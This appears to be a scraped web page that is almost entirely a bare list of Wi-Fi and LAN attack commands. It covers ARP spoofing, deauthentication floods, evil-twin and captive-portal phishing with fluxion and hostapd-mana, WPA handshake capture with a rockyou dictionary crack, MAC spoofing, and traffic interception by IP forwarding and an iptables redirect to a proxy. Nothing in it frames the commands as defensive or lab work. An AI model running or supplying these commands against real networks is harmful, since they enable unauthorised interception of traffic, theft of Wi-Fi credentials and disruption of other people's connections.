arpspoof -i wlan0 -t [target ip] [router ip] -r
Alert! To view more content, click the description below a terminal command.
arpspoof -i wlan0 -t [target ip] [router ip] -r
besside-ng --bssid <router_MAC> --channel 10 wlan1
sudo bettercap -iface wlan0
airodump-ng --bssid aa:bb:cc:dd:ee:ff -c 4 -w capture wlan1
sudo wifite
wifi.deauth ff:ff:ff:ff:ff:ff
sudo ./fluxion.sh
sudo tcpdump -i eth0 -w packets.pcap
macchanger -a wlan1
aireplay-ng --deauth 0 -a <BSSID of ROUTER> -c <STATION BSSID> -i wlan1
sudo hostapd-mana NinjaWiFi-mana.conf
echo 1 > /proc/sys/net/ipv4/ip_forward
sudo aireplay-ng -9 -e ninja-wifi -a 14:15:BS:14:BS:15 wlan0mon
sudo kismet -c wlan0 --no-ncurses
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sudo netdiscover
airmon-ng check
service network-manager restart
sudo airmon-ng start wlan0
driftnet -i eth0
airodump-ng -w dump wlan0mon
aircrack-ng -w /usr/share/wordlists/rockyou.txt -e networkname -b BS:ID:BS:ID:BS:ID wpa-01.cap